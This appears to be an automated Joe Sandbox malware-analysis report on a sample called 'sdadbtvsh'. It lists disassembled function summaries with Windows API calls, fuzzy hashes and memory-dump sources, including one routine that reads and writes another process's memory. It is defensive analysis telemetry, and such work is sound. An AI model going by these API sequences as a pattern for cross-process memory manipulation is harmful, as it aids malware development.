                                                                                              • Instruction ID: 3e33e3a4472a7f166c6e11e037c35d8c2f92f3bb730f82f4b960d55105149918
                                                                                              • Opcode Fuzzy Hash: 38f18ad6089ce925be05f44753a60df3b859504d7387afe4fad8acbe714e8f94
                                                                                              • Instruction Fuzzy Hash: 23218271900A28ABDB219FA4DC889EEBBBAFF44724F104216FD25DB281D7749985CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 005CD166
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CD189
                                                                                                • Part of subcall function 005C3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005CD1AF
                                                                                              • _free.LIBCMT ref: 005CD1C2
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CD1D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: 9cf34d7e7370412d38d85ef2129471b837c39fc79d4e7954863b1c9730f5068d
                                                                                              • Instruction ID: 5571ebde7ef9fb14a1bfee158351b8a90ef35336d89a3c867fd76eb3d3af240c
                                                                                              • Opcode Fuzzy Hash: 9cf34d7e7370412d38d85ef2129471b837c39fc79d4e7954863b1c9730f5068d
                                                                                              • Instruction Fuzzy Hash: 490184726016197F232266FA5C8CE7B6DBEFEC2BA1318013DFD05C2240DE618C02C1B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(0000000A,?,?,005BF66E,005B547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C318D
                                                                                              • _free.LIBCMT ref: 005C31C2
                                                                                              • _free.LIBCMT ref: 005C31E9
                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C31F6
                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005C31FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 9607c0410aa463e6e5c7406e11b73ef8a07d72c56582324c87995e8573c9ddcc
                                                                                              • Instruction ID: eb54910c6a3bfafb6665686332217edf4a16f4d493756354e9b47f46616eb51f
                                                                                              • Opcode Fuzzy Hash: 9607c0410aa463e6e5c7406e11b73ef8a07d72c56582324c87995e8573c9ddcc
                                                                                              • Instruction Fuzzy Hash: BF01F976200E0A7F972267F59C4EF2A1E6EBFD5371B29842CF415D2191EE608943C160
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?,?,005F0BEE), ref: 005F08BB
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F08D6
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F08E4
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?), ref: 005F08F4
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005F07D1,80070057,?,?), ref: 005F0900
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: a8b3a39ebb12f1a1edb95feec30f7676334dcd522b236086b275fe8ee67ab2f1
                                                                                              • Instruction ID: b8f17659930ac9632e2d71c9d512da7c86ed9ad4ef1b4097e531e0a00dbed037
                                                                                              • Opcode Fuzzy Hash: a8b3a39ebb12f1a1edb95feec30f7676334dcd522b236086b275fe8ee67ab2f1
                                                                                              • Instruction Fuzzy Hash: AD018F72600608AFDB204F64DC04BAA7EBEFB48792F185024FA05D3252E7B8DD419BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 005FF1C3
                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 005FF1D1
                                                                                              • Sleep.KERNEL32(00000000), ref: 005FF1D9
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 005FF1E3
                                                                                              • Sleep.KERNEL32 ref: 005FF21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: a15f2affe15a82923788b424783bec5bc9173f88613b13e216d22b5e522e2648
                                                                                              • Instruction ID: 51d1563c7f06b650e650f0402c91bad7b4440b229b3813437f8b82af66d12ad4
                                                                                              • Opcode Fuzzy Hash: a15f2affe15a82923788b424783bec5bc9173f88613b13e216d22b5e522e2648
                                                                                              • Instruction Fuzzy Hash: 46011739C00A1DDBDF10AFA4EC4DAEDBF7ABF09711F010466EA01B2650CB349655C765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BE0
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BED
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600BFA
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C07
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C14
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00600A39,?,00603C56,?,00000001,005D3ACE,?), ref: 00600C21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 88047517d5d25f430ac224f17df8f9f6a9ed190e38a45b81c34ad872d5702f38
                                                                                              • Instruction ID: 5875f65473cf26f75727cd3e3c23a72f5ea1f68ba960cb7b41070d867fd311c8
                                                                                              • Opcode Fuzzy Hash: 88047517d5d25f430ac224f17df8f9f6a9ed190e38a45b81c34ad872d5702f38
                                                                                              • Instruction Fuzzy Hash: C101E271840B16CFD730AF66D880857FBFAEF503193008A3ED09242A71C771A845CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 005F64E7
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 005F64FE
                                                                                              • MessageBeep.USER32(00000000), ref: 005F6516
                                                                                              • KillTimer.USER32(?,0000040A), ref: 005F6532
                                                                                              • EndDialog.USER32(?,00000001), ref: 005F654C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 179018c886c9271ae7a40385c5b52cef274dd6f800bd5b16da77fb8211607fd1
                                                                                              • Instruction ID: 0cd61ed91da44a0632753d30320fdede1c43ecbf1afb69f21cbc9abb91d08599
                                                                                              • Opcode Fuzzy Hash: 179018c886c9271ae7a40385c5b52cef274dd6f800bd5b16da77fb8211607fd1
                                                                                              • Instruction Fuzzy Hash: F701A430500B08ABEB305B20DE4EBA67BB9FF10B05F400559B687B14E1DBF8AA55CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 005C264E
                                                                                                • Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
                                                                                                • Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80
                                                                                              • _free.LIBCMT ref: 005C2660
                                                                                              • _free.LIBCMT ref: 005C2673
                                                                                              • _free.LIBCMT ref: 005C2684
                                                                                              • _free.LIBCMT ref: 005C2695
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3aeb65603b000928928fbbf3933bb523c189a65d04b9b9d33b6733462d91f5c0
                                                                                              • Instruction ID: 8885e2a38d1515d07f1ba4fd5b5288257bb80e3763d7a18b073b49d5ecdc1d17
                                                                                              • Opcode Fuzzy Hash: 3aeb65603b000928928fbbf3933bb523c189a65d04b9b9d33b6733462d91f5c0
                                                                                              • Instruction Fuzzy Hash: 04F030B04416529F8711AFA4AC15D493FAAFB65751B05221EF415D72B4CBB00AC3AF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005B05D2: EnterCriticalSection.KERNEL32(0066170C,?,00000000,?,0059D1DA,00663540,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?), ref: 005B05DD
                                                                                                • Part of subcall function 005B05D2: LeaveCriticalSection.KERNEL32(0066170C,?,0059D1DA,00663540,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?,00000001,00662430), ref: 005B061A
                                                                                                • Part of subcall function 005B0433: __onexit.LIBCMT ref: 005B0439
                                                                                              • __Init_thread_footer.LIBCMT ref: 00616B95
                                                                                                • Part of subcall function 005B0588: EnterCriticalSection.KERNEL32(0066170C,00000000,?,0059D208,00663540,005D27E9,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?), ref: 005B0592
                                                                                                • Part of subcall function 005B0588: LeaveCriticalSection.KERNEL32(0066170C,?,0059D208,00663540,005D27E9,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?,00000001), ref: 005B05C5
                                                                                                • Part of subcall function 00603EF6: LoadStringW.USER32(00000066,?,00000FFF,0062DCEC), ref: 00603F3E
                                                                                                • Part of subcall function 00603EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00603F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                              • String ID: x3f$x3f$x3f
                                                                                              • API String ID: 1072379062-2431936157
                                                                                              • Opcode ID: 607fc2182a303a98fed1f9c5275f1b848831fa3945b33a36a6dc33357cec00c6
                                                                                              • Instruction ID: cb6757a4e95b44a8e66a1ecfcb5f77e38450339392f27e295a2caec017fa46be
                                                                                              • Opcode Fuzzy Hash: 607fc2182a303a98fed1f9c5275f1b848831fa3945b33a36a6dc33357cec00c6
                                                                                              • Instruction Fuzzy Hash: B4C16D79A0410AAFDB14DF58C895DFEB7BAFF49300F148129F9059B291DB70AD85CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 0059D203
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: D5f$D5f$D5f
                                                                                              • API String ID: 1385522511-2099992648
                                                                                              • Opcode ID: 9b88bd0de1f118173a43e33739d2a99cf0bca4820060f342a6dffd898b5550b2
                                                                                              • Instruction ID: 813514c48f1bc523c7f56eb0d75e57b73af6f261ffd26c48cd254ed85a3fe490
                                                                                              • Opcode Fuzzy Hash: 9b88bd0de1f118173a43e33739d2a99cf0bca4820060f342a6dffd898b5550b2
                                                                                              • Instruction Fuzzy Hash: 52913B75A00216CFCF18CF59C4906AABFF2FF58310F24456AD946A7351E731EA81DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005FBCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F2A60,?,?,00000034,00000800,?,00000034), ref: 005FBD09
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005F2FF0
                                                                                                • Part of subcall function 005FBCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F2A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 005FBCD4
                                                                                                • Part of subcall function 005FBC06: GetWindowThreadProcessId.USER32(?,?), ref: 005FBC31
                                                                                                • Part of subcall function 005FBC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005F2A24,00000034,?,?,00001004,00000000,00000000), ref: 005FBC41
                                                                                                • Part of subcall function 005FBC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005F2A24,00000034,?,?,00001004,00000000,00000000), ref: 005FBC57
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F305D
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F30AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 5b4ac8f005391712a03a78bf44cfa2718860596f68cc636a01499fa81298b6fc
                                                                                              • Instruction ID: 8b4ed7a7718d24501e2efef99f9a14f591283e4309c94dade9b52405912f75fa
                                                                                              • Opcode Fuzzy Hash: 5b4ac8f005391712a03a78bf44cfa2718860596f68cc636a01499fa81298b6fc
                                                                                              • Instruction Fuzzy Hash: A9413C7690021DAFDB10DFA4CD86AEEBBB8FB49700F004095FA55B7180DA756E85CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005FCAC6
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 005FCB0C
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00662990,016D59D8), ref: 005FCB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: f3661a204858896ca0e9eb16aa1ec877053ffb4e26dbdecbdd4d6a036be8fa87
                                                                                              • Instruction ID: 69b6f5b36ce978e6cddf04147720a33553cdb9416f1aeb328a1ccc729748d811
                                                                                              • Opcode Fuzzy Hash: f3661a204858896ca0e9eb16aa1ec877053ffb4e26dbdecbdd4d6a036be8fa87
                                                                                              • Instruction Fuzzy Hash: 2F41C23410534A9FD720DF28C94AF2ABFE4BF84320F04452DFAA1972D1D774A805CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0062DCD0,00000000,?,?,?,?), ref: 00624E09
                                                                                              • GetWindowLongW.USER32 ref: 00624E26
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00624E36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: dee6117da2e8fcbf4bb6b5bcf2026585381171f84bc4138a4462f8e83a8da614
                                                                                              • Instruction ID: 5ba468e9845052c117c6104df29500fe62873c02dd48478bd1b2299723ed9006
                                                                                              • Opcode Fuzzy Hash: dee6117da2e8fcbf4bb6b5bcf2026585381171f84bc4138a4462f8e83a8da614
                                                                                              • Instruction Fuzzy Hash: 10318E31100A16AFEF219E38DC45BEA7BAAFF48334F214715F975932E0DB70A8518B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0062489F
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006248B3
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 006248D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: aa4b9ff4284aef5ececcd3e6d24d35521fafe965476a0270d35a14d2b31b5ee4
                                                                                              • Instruction ID: c03dc20d96129ccfaaf187accc47d30220d4c552d4b50368974648cccc745f04
                                                                                              • Opcode Fuzzy Hash: aa4b9ff4284aef5ececcd3e6d24d35521fafe965476a0270d35a14d2b31b5ee4
                                                                                              • Instruction Fuzzy Hash: 3121D132610629AFDF218F90DC46FEA3BBAEF88714F110114FA15AB1D0DAB5E8558B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00625064
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00625072
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00625079
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
